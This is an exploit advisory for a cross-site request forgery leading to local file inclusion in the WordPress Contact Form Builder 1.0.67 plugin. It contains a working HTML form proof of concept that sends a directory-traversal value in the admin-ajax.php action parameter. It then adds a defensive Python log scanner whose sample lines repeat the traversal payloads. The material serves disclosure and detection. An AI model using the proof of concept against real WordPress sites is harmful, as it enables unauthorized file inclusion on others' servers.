
"WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion"

Author: Panagiotis Vagenas

Platform: php

Release date: 2019-04-22

# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1

Description
-----------

The plugin implements the following AJAX actions:

- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`

All of them call the function `contact_form_maker_ajax`. This function
dynamically loads a file named by `$_GET['action']`, or by
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action, a user can put the plugin action
in `$_GET['action']` and the AJAX action in `$_POST['action']`.
Leveraging that, and the fact that no sanitization is performed on
`$_GET['action']`, a malicious actor can perform a CSRF attack that
loads a file via directory traversal, leading to a Local File Inclusion
vulnerability.

PoC
---

```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
    <label>AJAX action:
        <select name="action">
                <option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
                <option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
                <option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
                <option value="CFMShortcode">CFMShortcode</option>
        </select>
    </label>
    <button type="submit" value="Submit">Submit</button>
</form>
```
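
A defender-side check for the request shape described above, as an added example that is not part of the original advisory: it scans web-server access-log lines for `admin-ajax.php` requests whose query-string `action` is not a plain identifier. The combined log format, the identifier pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed input: Apache/nginx "combined" access-log lines.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Assumption: legitimate AJAX action names are plain hook identifiers.
SAFE_ACTION_RE = re.compile(r"[A-Za-z0-9_-]+")
AJAX_PATH = "/wp-admin/admin-ajax.php"


def suspicious_ajax_actions(log_lines):
    """Return (line_no, client_ip, method, decoded_action) for each
    admin-ajax.php request whose query-string `action` is not a plain
    identifier (for example, it contains '/' or '..')."""
    findings = []
    for line_no, line in enumerate(log_lines, start=1):
        match = LINE_RE.match(line)
        if not match:
            continue  # not a request line we understand
        url = urlsplit(match.group("target"))
        # endswith() also covers WordPress installed in a subdirectory.
        if not url.path.endswith(AJAX_PATH):
            continue
        # parse_qs percent-decodes, so %2F..%2F is seen as /../
        for action in parse_qs(url.query, keep_blank_values=True).get("action", []):
            if not SAFE_ACTION_RE.fullmatch(action):
                findings.append(
                    (line_no, match.group("ip"), match.group("method"), action)
                )
    return findings


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Apr/2019:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
    '203.0.113.9 - - [22/Apr/2019:10:00:07 +0000] "POST /wp-admin/admin-ajax.php?action=/../../../../../../index HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/Apr/2019:10:00:09 +0000] "POST /wp-admin/admin-ajax.php?action=%2F..%2F..%2Findex HTTP/1.1" 200 5120',
    '198.51.100.2 - - [22/Apr/2019:10:00:12 +0000] "GET /index.php?action=../x HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in suspicious_ajax_actions(SAMPLE_LOG):
        print(finding)
```

A standard access log does not record the POST body, so the AJAX action WordPress dispatched on is not visible here; only the query-string value is checked.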